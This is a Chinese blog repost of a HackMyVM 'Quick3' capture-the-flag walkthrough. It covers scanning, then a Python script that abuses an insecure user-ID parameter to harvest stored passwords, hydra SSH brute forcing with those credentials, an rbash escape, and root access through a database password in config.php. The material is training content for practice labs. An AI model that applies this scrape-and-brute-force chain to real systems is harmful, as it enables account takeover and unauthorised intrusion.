devbox
我家小花儿
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

[HackMyVM]靶场 Quick3

作者:我家小花儿 | 2024-03-08 14:08:14

[HackMyVM]靶场 Quick3

kali:192.168.56.104

主机发现

arp-scan -l
  1. # arp-scan -l 
  2. Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
  3. Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
  4. 192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
  5. 192.168.56.100  08:00:27:ca:cc:72       PCS Systemtechnik GmbH
  6. 192.168.56.113  08:00:27:28:12:35       PCS Systemtechnik GmbH

靶机:192.168.56.113

端口扫描

nmap -p- -A 192.168.56.113
  1. # nmap -p- -A 192.168.56.113
  2. Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 17:52 CST
  3. Nmap scan report for 192.168.56.113
  4. Host is up (0.00044s latency).
  5. Not shown: 65533 closed tcp ports (reset)
  6. PORT   STATE SERVICE VERSION
  7. 22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
  8. | ssh-hostkey: 
  9. |   256 2e:7a:1f:17:57:44:6f:7f:f9:ce:ab:a1:4f:cd:c7:19 (ECDSA)
  10. |_  256 93:7e:d6:c9:03:5b:a1:ee:1d:54:d0:f0:27:0f:13:eb (ED25519)
  11. 80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
  12. |_http-title: Quick Automative - Home
  13. |_http-server-header: Apache/2.4.52 (Ubuntu)
  14. MAC Address: 08:00:27:28:12:35 (Oracle VirtualBox virtual NIC)

开启了22 80 端口

目录扫描

gobuster dir -u http://192.168.56.113 -x html,txt,php,zip,bak --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  1. /index.html           (Status: 200) [Size: 51414]
  2. /images               (Status: 301) [Size: 317] [--> http://192.168.56.113/images/]
  3. /img                  (Status: 301) [Size: 314] [--> http://192.168.56.113/img/]
  4. /modules              (Status: 301) [Size: 318] [--> http://192.168.56.113/modules/]
  5. /css                  (Status: 301) [Size: 314] [--> http://192.168.56.113/css/]
  6. /lib                  (Status: 301) [Size: 314] [--> http://192.168.56.113/lib/]
  7. /js                   (Status: 301) [Size: 313] [--> http://192.168.56.113/js/]
  8. /customer             (Status: 301) [Size: 319] [--> http://192.168.56.113/customer/]
  9. /404.html             (Status: 200) [Size: 5013]
  10. /fonts                (Status: 301) [Size: 316] [--> http://192.168.56.113/fonts/]

customer界面是一个注册界面

注册个账号进入1@qq.com/1

在myprofile里面发现可以修改密码,并且原密码只是单纯的被遮盖,在源码里可以看到

更关键的是,在url中修改id可以直接读取其他用户的密码

爬虫爬一下用户名密码

  1. import requests
  2. from bs4 import BeautifulSoup
  3.  
  4. session = requests.Session()
  5. session.cookies.update({"PHPSESSID": "i507lvgtnbd3a9ugi6thbvqir5"})
  6.  
  7. for id in range(1, 30):
  8.     response = session.get(f"http://192.168.56.113/customer/user.php?id={id}")
  9.     soup = BeautifulSoup(response.content, "lxml")
  10.     username = soup.select("ul.list-unstyled")[1]
  11.     username_parts = username.text.strip().split(":")[1].strip().split("@")
  12.     if len(username_parts) == 2:
  13.         username, domain = username_parts
  14.         if domain == "quick.hmv":
  15.             password = soup.find("input", id="oldpassword")["value"]
  16.             print(f"{username}:{password}")
  1. info:q27QAO6FeisAAtbW
  2. nick.greenhorn:H01n8X0fiiBhsNbI
  3. andrew.speed:oyS6518WQxGK8rmk
  4. mike.cooper:6G3UCx6aH6UYvJ6m
  5. jeff.anderson:Kn4tLAPWDbFK9Zv2
  6. coos.busters:8RMVrdd82n5ymc4Z
  7. juan.mecanico:DX5cM3yFg6wJgdYb
  8. john.smith:yT9Hy2fhX7VhmEkj
  9. lara.johnson:GUFTV4ERd7QAexxw

处理一下,用姓作为username

  1. info:q27QAO6FeisAAtbW
  2. nick:H01n8X0fiiBhsNbI
  3. andrew:oyS6518WQxGK8rmk
  4. mike:6G3UCx6aH6UYvJ6m
  5. jeff:Kn4tLAPWDbFK9Zv2
  6. coos:8RMVrdd82n5ymc4Z
  7. juan:DX5cM3yFg6wJgdYb
  8. john:yT9Hy2fhX7VhmEkj
  9. lara:GUFTV4ERd7QAexxw

hydra爆破一下

  1. # hydra -C user.txt 192.168.56.113 ssh             
  2. Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  3.  
  4. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-04 18:29:10
  5. [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
  6. [DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries, ~1 try per task
  7. [DATA] attacking ssh://192.168.56.113:22/
  8. [22][ssh] host: 192.168.56.113   login: mike   password: 6G3UCx6aH6UYvJ6m
  9. 1 of 1 target successfully completed, 1 valid password found
  10. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-04 18:29:15

mike/6G3UCx6aH6UYvJ6m

ssh连接拿到user权限

  1. mike@quick3:~$ ls -al
  2. total 36
  3. drwxr-x---  4 mike mike 4096 Jan 24 12:56 .
  4. drwxr-xr-x 11 root root 4096 Jan 24 10:38 ..
  5. lrwxrwxrwx  1 mike mike    9 Jan 24 10:46 .bash_history -> /dev/null
  6. -rw-r--r--  1 mike mike  220 Jan 21 13:57 .bash_logout
  7. -rw-r--r--  1 mike mike 3797 Jan 24 12:56 .bashrc
  8. drwx------  2 mike mike 4096 Jan 21 14:00 .cache
  9. drwxrwxr-x  3 mike mike 4096 Jan 21 13:58 .local
  10. -rw-r--r--  1 mike mike  807 Jan 21 13:57 .profile
  11. -rw-rw-r--  1 mike mike 4166 Jan 21 13:58 user.txt
  1. mike@quick3:~$ cd ..
  2. -rbash: cd: restricted

发现shell是rbash,输入bash拿到正常shell

然后就是翻文件,在customer里面的配置文件里面有root的密码

  1. mike@quick3:/var/www/html/customer$ cat config.php
  2. <?php
  3. // config.php
  4. $conn = new mysqli('localhost', 'root', 'fastandquicktobefaster', 'quick');
  5.  
  6. // Check connection
  7. if ($conn->connect_error) {
  8.         die("Connection failed: " . $conn->connect_error);
  9. }
  10. ?>

成功登录root拿到flag

总结:越权,爬虫,配置文件

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/210560
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号